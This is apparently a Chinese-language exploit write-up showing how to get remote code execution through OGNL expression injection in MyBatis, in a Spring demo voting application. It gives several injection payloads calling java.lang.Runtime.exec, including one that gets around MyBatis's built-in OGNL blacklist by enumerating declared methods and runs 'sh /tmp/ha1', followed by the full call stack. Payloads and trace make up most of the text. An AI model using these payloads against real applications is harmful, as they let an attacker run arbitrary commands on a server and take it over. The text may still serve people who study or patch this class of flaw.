${pageContext.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("whoami")}

发现并不能成功执行

debug发现

mybatis中自带了OGNL的waf 即遇到Runtime.exec直接抛出异常。则换了一种反射

${pageContext.setAttribute("a","".getClass().forName("java.lang.Runtime").getMethod("exec","".getClass()).invoke("".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null),"whoami"))}

依旧不可以执行。debug发现报错数组越界

这里很久都没找到原因。完全不知道是为什么，如果有知道的师傅也可以告知于我

之后的思路就在调试反射了。最后发现为什么不能用OGNL的语法呢？ 查了一下

${(#clss = #this.getClass().forName("java.lang.Runtime")).(#getme = #clss.getDeclaredMethods().{^ #this.name.equals("getRuntime")\\}[0]).(#result = #getme.invoke(null,null)).(#execu = #clss.getDeclaredMethods().{? #this.name.equals("exec")\\}.{? #this.getParameters()[0].getType().getName().equals("java.lang.String")\\}.{? #this.getParameters().length < 2\\}[0]).(#execu.invoke(#result,"sh /tmp/ha1"))}

就可以了

整体调用栈如下

exec:312, Runtime (java.lang)
invoke0:-1, NativeMethodAccessorImpl (jdk.internal.reflect)
invoke:62, NativeMethodAccessorImpl (jdk.internal.reflect)
invoke:43, DelegatingMethodAccessorImpl (jdk.internal.reflect)
invoke:566, Method (java.lang.reflect)
invoke0:-1, NativeMethodAccessorImpl (jdk.internal.reflect)
invoke:62, NativeMethodAccessorImpl (jdk.internal.reflect)
invoke:43, DelegatingMethodAccessorImpl (jdk.internal.reflect)
invoke:566, Method (java.lang.reflect)
invokeMethodInsideSandbox:1245, OgnlRuntime (org.apache.ibatis.ognl)
invokeMethod:1230, OgnlRuntime (org.apache.ibatis.ognl)
callAppropriateMethod:1962, OgnlRuntime (org.apache.ibatis.ognl)
callMethod:68, ObjectMethodAccessor (org.apache.ibatis.ognl)
callMethod:2038, OgnlRuntime (org.apache.ibatis.ognl)
getValueBody:97, ASTMethod (org.apache.ibatis.ognl)
evaluateGetValueBody:212, SimpleNode (org.apache.ibatis.ognl)
getValue:258, SimpleNode (org.apache.ibatis.ognl)
getValueBody:141, ASTChain (org.apache.ibatis.ognl)
evaluateGetValueBody:212, SimpleNode (org.apache.ibatis.ognl)
getValue:258, SimpleNode (org.apache.ibatis.ognl)
getValue:586, Ognl (org.apache.ibatis.ognl)
getValue:550, Ognl (org.apache.ibatis.ognl)
getValue:46, OgnlCache (org.apache.ibatis.scripting.xmltags)
handleToken:77, TextSqlNode$BindingTokenParser (org.apache.ibatis.scripting.xmltags)
parse:77, GenericTokenParser (org.apache.ibatis.parsing)
apply:51, TextSqlNode (org.apache.ibatis.scripting.xmltags)
getBoundSql:39, DynamicSqlSource (org.apache.ibatis.scripting.xmltags)
getBoundSql:157, ProviderSqlSource (org.apache.ibatis.builder.annotation)
getBoundSql:305, MappedStatement (org.apache.ibatis.mapping)
query:87, CachingExecutor (org.apache.ibatis.executor)
selectList:151, DefaultSqlSession (org.apache.ibatis.session.defaults)
selectList:145, DefaultSqlSession (org.apache.ibatis.session.defaults)
selectList:140, DefaultSqlSession (org.apache.ibatis.session.defaults)
selectOne:76, DefaultSqlSession (org.apache.ibatis.session.defaults)
invoke0:-1, NativeMethodAccessorImpl (jdk.internal.reflect)
invoke:62, NativeMethodAccessorImpl (jdk.internal.reflect)
invoke:43, DelegatingMethodAccessorImpl (jdk.internal.reflect)
invoke:566, Method (java.lang.reflect)
invoke:427, SqlSessionTemplate$SqlSessionInterceptor (org.mybatis.spring)
selectOne:-1, $Proxy56 (com.sun.proxy)
selectOne:160, SqlSessionTemplate (org.mybatis.spring)
execute:87, MapperMethod (org.apache.ibatis.binding)
invoke:145, MapperProxy$PlainMethodInvoker (org.apache.ibatis.binding)
invoke:86, MapperProxy (org.apache.ibatis.binding)
getVoteById:-1, $Proxy61 (com.sun.proxy)
getDetailedVoteById:62, VoteService (club.example.demo.service)
getDetailedVoteById:46, VoteController (club.example.demo.controller)